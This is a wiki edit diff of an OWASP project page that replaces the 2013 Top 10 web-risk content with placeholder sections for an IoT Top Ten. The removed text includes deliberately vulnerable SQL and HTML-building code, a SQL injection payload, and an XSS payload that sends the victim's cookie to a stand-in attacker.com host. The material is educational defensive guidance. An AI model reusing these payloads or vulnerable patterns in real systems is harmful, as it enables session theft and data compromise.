|
|
| Line 16: |
Line 16: |
| | | | |
| | | | |
| − | ='''Main'''= | + | ='''___________Main___________'''= |
| | | | |
| | <div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div> | | <div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div> |
| Line 187: |
Line 187: |
| | }} | | }} |
| | | | |
| − | | + | ='''___________FAQs___________'''= |
| − | ='''OWASP Top 10'''= | |
| | | | |
| | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}} | | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}} |
| | | | |
| − | ==A1-Injection==
| + | ; Q1 |
| − | Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
| + | : A1 |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=2|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A2-Broken Authentication and Session Management==
| |
| − | Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=left|title=3|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A3-Cross-Site Scripting (XSS)==
| |
| − | XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=4|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A4-Insecure Direct Object References==
| |
| − | A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=left|title=5|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A5-Security Misconfiguration==
| |
| − | Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
| |
| − | | |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=6|risk=1|year=2013|language=en}}
| |
| − | | |
| − | == A6-Sensitive Data Exposure==
| |
| − | Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=left|title=7|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A7-Missing Function Level Access Control==
| |
| − | Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=8|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A8-Cross-Site Request Forgery (CSRF)==
| |
| − | A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=left|title=9|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A9-Using Components with Known Vulnerabilities==
| |
| − | Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=10|risk=1|year=2013|language=en}}
| |
| − | | |
| − | ==A10-Unvalidated Redirects and Forwards==
| |
| − | Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
| |
| | | | |
| | + | ; Q2 |
| | + | : A2 |
| | | | |
| | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate | | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate |
| − | |headertab=OWASP Top 10 | + | |headertab=FAQs |
| | |usenext=2013NextLink | | |usenext=2013NextLink |
| | |next=A2-{{Top_10_2010:ByTheNumbers | | |next=A2-{{Top_10_2010:ByTheNumbers |
| Line 255: |
Line 210: |
| | }} | | }} |
| | | | |
| − | ='''A1-Injection'''= | + | ='''___________Acknowledgements___________'''= |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=1|prevalence=2|detectability=2|impact=1|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.
| |
| | | | |
| − | </td>
| + | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}} |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>Attacker sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.
| |
| | | | |
| − | </td>
| + | ==Volunteers== |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>[http://www.owasp.org/index.php/Injection_Flaws Injection flaws] occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.
| + | The OWASP Internet of Things Top Ten Project is developed by a worldwide team of volunteers. The primary contributors to date have been: |
| | | | |
| − | </td>
| + | * xxx |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.
| + | * xxx |
| | | | |
| − | </td>
| + | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=TenProjects|position=right|title=2|risk=1|year=2013|language=en}} |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>Consider the business value of the affected data and the platform running the interpreter. All data could be stolen, modified, or deleted. Could your reputation be harmed?
| |
| | | | |
| − | </td>
| + | ==Others== |
| − | {{Top_10_2010:SummaryTableEndTemplate|year=2013}}
| |
| | | | |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=1|year=2013|language=en}}
| + | * xxx |
| − | The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.
| + | * xxx |
| − | | |
| − | Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.
| |
| − | | |
| − | Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover
| |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=1|year=2013|language=en}}
| |
| − | Preventing injection requires keeping untrusted data separate from commands and queries.
| |
| − | # The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.
| |
| − | # If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. [https://www.owasp.org/index.php/ESAPI OWASP’s ESAPI] provides many of these [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html escaping routines].
| |
| − | # Positive or “white list” input validation is also recommended, but is not a complete defense as many applications require special characters in their input. If special characters are required, only approaches 1. and 2. above will make their use safe. [https://www.owasp.org/index.php/ESAPI OWASP’s ESAPI] has an extensible library of [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html white list input validation routines].
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=1|year=2013|language=en}}
| |
| − | '''Scenario #1:''' The application uses untrusted data in the construction of the following '''vulnerable''' SQL call:
| |
| − | | |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
| |
| − | String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
| |
| − | | |
| − | </span>{{Top_10_2010:ExampleEndTemplate}}
| |
| − | '''Scenario #2:''' Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
| |
| − | Query HQLQuery = session.createQuery(“FROM accounts
| |
| − | WHERE custID='“ + request.getParameter("id") + "'");'''
| |
| − | | |
| − | </span>{{Top_10_2010:ExampleEndTemplate}}
| |
| − | In both cases, the attacker modifies the ‘id’ parameter value in her browser to send: <span style="color:red;">' or '1'='1</span>. For example:
| |
| − | | |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;"><nowiki>
| |
| − | http://example.com/app/accountView?id=' or '1'='1
| |
| − | </nowiki></span>{{Top_10_2010:ExampleEndTemplate}}
| |
| − | This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=1|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet OWASP SQL Injection Prevention Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet OWASP Query Parameterization Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Command_Injection OWASP Command Injection Article]
| |
| − | * [https://www.owasp.org/index.php/XXE OWASP XML eXternal Entity (XXE) Reference Article]
| |
| − | * [https://www.owasp.org/index.php/ASVS ASVS: Output Encoding/Escaping Requirements (V6)]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005) OWASP Testing Guide: Chapter on SQL Injection Testing]
| |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate}}
| |
| − | * [http://cwe.mitre.org/data/definitions/77.html CWE Entry 77 on Command Injection]
| |
| − | * [http://cwe.mitre.org/data/definitions/89.html CWE Entry 89 on SQL Injection] | |
| − | * [http://cwe.mitre.org/data/definitions/564.html CWE Entry 564 on Hibernate Injection] | |
| | | | |
| | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate | | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate |
| − | |headertab=FAQs | + | |headertab=Acknowledgements |
| | |usenext=2013NextLink | | |usenext=2013NextLink |
| | |next=A2-{{Top_10_2010:ByTheNumbers | | |next=A2-{{Top_10_2010:ByTheNumbers |
| Line 334: |
Line 240: |
| | }} | | }} |
| | | | |
| − | ='''A2-Broken Authentication and Session Management'''= | + | ='''___________Road Map and Getting Involved___________'''= |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}} | + | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}} |
| − | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=1|detectability=2|impact=1|year=2013|language=en}} | |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>
| |
| − | Consider anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>
| |
| − | Attacker uses leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.
| |
| | | | |
| − | </td>
| + | As of January 2014, the priorities are: |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>
| + | * xxx |
| − | Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.
| + | * xxx |
| | + | * xxx |
| | | | |
| − | </td>
| + | Involvement in the development and promotion of the OWASP Internet of Things Top Ten Project is actively encouraged! |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>
| + | You do not have to be a security expert in order to contribute. |
| − | Such flaws may allow some or even <u>all</u> accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.
| + | Some of the ways you can help: |
| − | | + | * xxx |
| − | </td>
| + | * xxx |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2013}}>
| |
| − | Consider the business value of the affected data or application functions.
| |
| − | | |
| − | Also consider the business impact of public exposure of the vulnerability.
| |
| − | | |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate|year=2013}}
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=1|risk=2|year=2013|language=en}}
| |
| − | Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:
| |
| − | # User authentication credentials aren’t protected when stored using hashing or encryption. See A6.
| |
| − | # Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
| |
| − | # Session IDs are exposed in the URL (e.g., URL rewriting).
| |
| − | # Session IDs are vulnerable to [https://www.owasp.org/index.php/Session_fixation session fixation] attacks.
| |
| − | # Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
| |
| − | # Session IDs aren’t rotated after successful login.
| |
| − | # Passwords, session IDs, and other credentials are sent over unencrypted connections. See A6.
| |
| − | See the [https://www.owasp.org/index.php/ASVS ASVS] requirement areas V2 and V3 for more details.
| |
| − | | |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=2|risk=2|year=2013|language=en}}
| |
| − | The primary recommendation for an organization is to make available to developers:
| |
| − | # '''A single set of strong authentication and session management controls.''' Such controls should strive to:
| |
| − | ## meet all the authentication and session management requirements defined in OWASP’s [https://www.owasp.org/index.php/ASVS Application Security Verification Standard] (ASVS) areas V2 (Authentication) and V3 (Session Management).
| |
| − | ## have a simple interface for developers. Consider the [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticator.html ESAPI Authenticator and User APIs] as good examples to emulate, use, or build upon.
| |
| − | # Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A3.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=3|risk=2|year=2013|language=en}}
| |
| − | '''Scenario #1:''' Airline reservations application supports URL rewriting, putting session IDs in the URL:
| |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<nowiki>h</nowiki>ttp://example.com/sale/saleitems<span style="color: red;">
| |
| − | ;jsessionid=2P0OC2JSNDLPSKHCJUN2JV</span>
| |
| − | ?dest=Hawaii
| |
| − | {{Top_10_2010:ExampleEndTemplate}}
| |
| − | An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.
| |
| − | | |
| − | '''Scenario #2:''' Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
| |
| − | | |
| − | '''Scenario #3:''' Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every users’ password to the attacker.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=4|risk=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}<br/>
| |
| − | For a more complete set of requirements and problems to avoid in this area, see the [https://www.owasp.org/index.php/ASVS ASVS requirements areas for Authentication (V2) and Session Management (V3)].
| |
| − | * [https://www.owasp.org/index.php/Authentication_Cheat_Sheet OWASP Authentication Cheat Sheet] | |
| − | * [https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet OWASP Forgot Password Cheat Sheet] | |
| − | * [https://www.owasp.org/index.php/Session_Management_Cheat_Sheet OWASP Session Management Cheat Sheet]
| |
| − | * [https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet OWASP Development Guide: Chapter on Authentication]
| |
| − | * [https://www.owasp.org/index.php/Testing_for_authentication OWASP Testing Guide: Chapter on Authentication]
| |
| − | | |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/287.html CWE Entry 287 on Improper Authentication]
| |
| − | * [http://cwe.mitre.org/data/definitions/384.html CWE Entry 384 on Session Fixation]
| |
| | | | |
| | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate | | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate |
| − | |headertab=FAQs | + | |headertab=Road Map and Getting Involved |
| | |usenext=2013NextLink | | |usenext=2013NextLink |
| | |next=A2-{{Top_10_2010:ByTheNumbers | | |next=A2-{{Top_10_2010:ByTheNumbers |
| Line 419: |
Line 268: |
| | }} | | }} |
| | | | |
| − | ='''A3-Cross-Site Scripting (XSS)'''=
| |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| + | ='''___________Project About___________'''= |
| − | {{Top_10:SummaryTableTemplate|exploitability=2|prevalence=0|detectability=1|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.
| |
| − | </td>
| |
| | | | |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| + | {{Top_10:SubsectionTableBeginTemplate|type=headertab}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=IoT|position=firstLeft|title=1|risk=10|year=2013|language=en}} |
| − | [[Cross-site_Scripting_(XSS) | XSS]] is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are two different types of XSS flaws: 1) [[Cross-site_Scripting_(XSS) | Stored]] and 2) [[Cross-site_Scripting_(XSS) | Reflected]], and each of these can occur on the a) [[Types_of_Cross-Site_Scripting#Server_XSS | Server ]] or b) on the [[Types_of_Cross-Site_Scripting#Client_XSS | Client]].
| + | {{:Projects/OWASP_Internet_of_Things_Top_Ten_Project}} |
| − | | |
| − | Detection of most [[Types_of_Cross-Site_Scripting#Server_XSS | Server XSS]] flaws is fairly easy via testing or code analysis. [[Types_of_Cross-Site_Scripting#Client_XSS | Client XSS]] is very difficult to identify.
| |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.
| |
| − | | |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider the business value of the affected system and all the data it processes.
| |
| − | Also consider the business impact of public exposure of the vulnerability.
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| − | | |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=3|year=2013|language=en}} | |
| − | | |
| − | You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using [https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf safe JavaScript APIs]? For unsafe JavaScript APIs, encoding or validation must also be used.
| |
| − | | |
| − | Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.
| |
| − | | |
| − | Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2013|language=en}}
| |
| − | Preventing XSS requires separation of untrusted data from active browser content.
| |
| − | # The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the [https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet OWASP XSS Prevention Cheat Sheet] for details on the required data escaping techniques.
| |
| − | # Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is <u>not a complete defense</u> as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
| |
| − | # For rich content, consider auto-sanitization libraries like OWASP’s [https://www.owasp.org/index.php/AntiSamy AntiSamy] or the [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project Java HTML Sanitizer Project].
| |
| − | # Consider [https://www.owasp.org/index.php/Content_Security_Policy Content Security Policy (CSP)] to defend against XSS across your entire site.
| |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2013|language=en}} | |
| − | The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
| |
| − | | |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
| |
| − | (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
| |
| − | | |
| − | </span>{{Top_10_2010:ExampleEndTemplate}}
| |
| − | | |
| − | The attacker modifies the 'CC' parameter in their browser to:
| |
| − | | |
| − | {{Top_10_2010:ExampleBeginTemplate|year=2013}}<span style="color:red;">
| |
| − | <span style="color:red;">'><script>document.location=
| |
| − | '<nowiki>h</nowiki>ttp://www.attacker.com/cgi-bin/cookie.cgi
| |
| − | ?foo='+document.cookie</script>'.</span>
| |
| − | | |
| − | </span>{{Top_10_2010:ExampleEndTemplate}}
| |
| − | | |
| − | This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
| |
| − | | |
| − | Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See A8 for info on CSRF.
| |
| − | | |
| − | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=references|position=right|risk=3|year=2013|language=en}}
| |
| − | {{Top_10_2010:SubSubsectionOWASPReferencesTemplate}}
| |
| − | * [[Types of Cross-Site Scripting]]
| |
| − | * [[XSS (Cross Site Scripting) Prevention Cheat Sheet | OWASP XSS Prevention Cheat Sheet
| |
| − | ]]
| |
| − | * [[DOM_based_XSS_Prevention_Cheat_Sheet | OWASP DOM based XSS Prevention Cheat Sheet]]
| |
| − | * [[Cross-site_Scripting_(XSS) | OWASP Cross-Site Scripting Article]]
| |
| − | * [http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html ESAPI Encoder API]
| |
| − | * [[ASVS | ASVS: Output Encoding/Escaping Requirements (V6)]]
| |
| − | * [[AntiSamy | OWASP AntiSamy: Sanitization Library]]
| |
| − | * [[Testing_for_Data_Validation | Testing Guide: 1st 3 Chapters on Data Validation Testing]]
| |
| − | * [[Reviewing_Code_for_Cross-site_scripting | OWASP Code Review Guide: Chapter on XSS Review]]
| |
| − | * [[XSS_Filter_Evasion_Cheat_Sheet | OWASP XSS Filter Evasion Cheat Sheet]]
| |
| − | | |
| − | {{Top_10_2010:SubSubsectionExternalReferencesTemplate|language=en}}
| |
| − | * [http://cwe.mitre.org/data/definitions/79.html CWE Entry 79 on Cross-Site Scripting]
| |
| | | | |
| | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate | | {{Top_10:SubsectionTableEndTemplate}} {{Top_10_2013:TopTemplate |
| − | |headertab=FAQs | + | |headertab=Project About |
| − | |usenext=2013NextLink
| + | |usenext=2013NextLink |
| | |next=A2-{{Top_10_2010:ByTheNumbers | | |next=A2-{{Top_10_2010:ByTheNumbers |
| | |2 | | |2 |
| Line 512: |
Line 287: |
| | }} | | }} |
| | | | |
| − | ='''A4-Insecure Direct Object References'''=
| |
| | | | |
| − | {{Top_10_2010:SummaryTableHeaderBeginTemplate|year=2013|language=en}}
| |
| − | {{Top_10:SummaryTableTemplate|exploitability=1|prevalence=2|detectability=1|impact=2|year=2013|language=en}}
| |
| − | {{Top_10_2010:SummaryTableHeaderEndTemplate|year=2013}}
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Consider the types of users of your system. Do any users have only partial access to certain types of system data?
| |
| | | | |
| − | </td>
| + | ='''A1-Injection'''= |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. Is access granted?
| |
| | | | |
| − | </td>
| |
| − | <td colspan=2 {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified.
| |
| | | | |
| − | </td>
| + | ='''A2-Broken Authentication and Session Management'''= |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>
| |
| − | Such flaws can compromise all the data that can be referenced by the parameter. Unless object references are unpredictable, it’s easy for an attacker to access all available data of that type.
| |
| | | | |
| − | </td>
| |
| − | <td {{Template:Top 10 2010:SummaryTableRowStyleTemplate}}>Consider the business value of the exposed data.
| |
| | | | |
| − | Also consider the business impact of public exposure of the vulnerability
| |
| − | </td>
| |
| − | {{Top_10_2010:SummaryTableEndTemplate}}
| |
| | | | |
| − | {{Top_10:SubsectionTableBeginTemplate|type=main}} {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=vulnerableTo|position=firstLeft|risk=4|year=2013|language=en}}
| |
| − | The best way to find out if an application is vulnerable to insecure direct object references is to verify that <u>all</u> object references have appropriate defenses. To achieve this, consider:
| |
| − | # For '''direct''' references to '''restricted''' resources, does the application fail to verify the user is authorized to access the exact resource they have requested?
| |
| − | # If the reference is an '''indirect''' reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?
| |
| | | | |
| − | Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.
| + | ='''A3-Cross-Site Scripting (XSS)'''= |
| | | | |
| − | {{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=4|year=2013|language=en}}
| |
